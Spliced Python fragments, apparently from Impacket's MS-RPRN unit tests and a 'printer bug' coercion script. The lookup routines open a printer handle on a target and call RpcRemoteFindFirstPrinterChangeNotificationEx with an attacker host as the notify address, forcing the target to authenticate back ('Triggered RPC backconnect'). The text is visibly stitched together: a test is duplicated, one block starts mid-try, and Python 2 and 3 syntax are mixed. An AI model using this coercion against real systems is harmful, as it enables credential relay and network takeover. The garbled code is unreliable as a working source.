def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
dce, rpctransport = self.connect()
request = rprn.RpcOpenPrinter()
request['pPrinterName'] = '\\\\%s\x00' % self.machine
request['pDatatype'] = NULL
request['pDevModeContainer']['pDevMode'] = NULL
request[
'AccessRequired'] = rprn.SERVER_READ | rprn.SERVER_ALL_ACCESS | rprn.SERVER_ACCESS_ADMINISTER
request.dump()
resp = dce.request(request)
resp.dump()
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = '\\\\%s\x00' % self.machine
request['pOptions'] = NULL
request.dump()
try:
resp = dce.request(request)
resp.dump()
except Exception as e:
if str(e).find('ERROR_INVALID_HANDLE') < 0:
raise
def lookup(self, rpctransport, host):
if self.__tcp_ping and self.ping(host) is False:
logging.info("Host is offline. Skipping!")
return
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except Exception as e:
# Probably this isn't a Windows machine or SMB is closed
logging.error("Timeout - Skipping host!")
return
dce.bind(rprn.MSRPC_UUID_RPRN)
logging.info('Bind OK')
try:
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
logging.error('Connection failed - skipping host!')
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
logging.error('Access denied - RPC call was denied')
dce.disconnect()
return
else:
raise
logging.info('Got handle')
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
request['pOptions'] = NULL
try:
resp = dce.request(request)
except Exception as e:
print(e)
logging.info(
'Triggered RPC backconnect, this may or may not have worked')
dce.disconnect()
return None
def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
dce, rpctransport = self.connect()
request = rprn.RpcOpenPrinter()
request['pPrinterName'] = "\\\\%s\x00" % self.machine
request['pDatatype'] = NULL
request['pDevModeContainer']['pDevMode'] = NULL
request[
'AccessRequired'] = rprn.SERVER_READ | rprn.SERVER_ALL_ACCESS | rprn.SERVER_ACCESS_ADMINISTER
request.dump()
resp = dce.request(request)
resp.dump()
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = "\\\\%s\x00" % self.machine
request['pOptions'] = NULL
request.dump()
with assertRaisesRegex(self, rprn.DCERPCSessionError,
"ERROR_INVALID_HANDLE"):
dce.request(request)
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
logging.error('Connection failed - skipping host!')
return False
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
logging.error('Access denied - RPC call was denied')
dce.disconnect()
return False
else:
return False
logging.info('Got handle')
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
request['pOptions'] = NULL
try:
resp = dce.request(request)
except Exception as e:
pass
logging.info(
'Triggered RPC backconnect, this may or may not have worked')
dce.disconnect()
return True
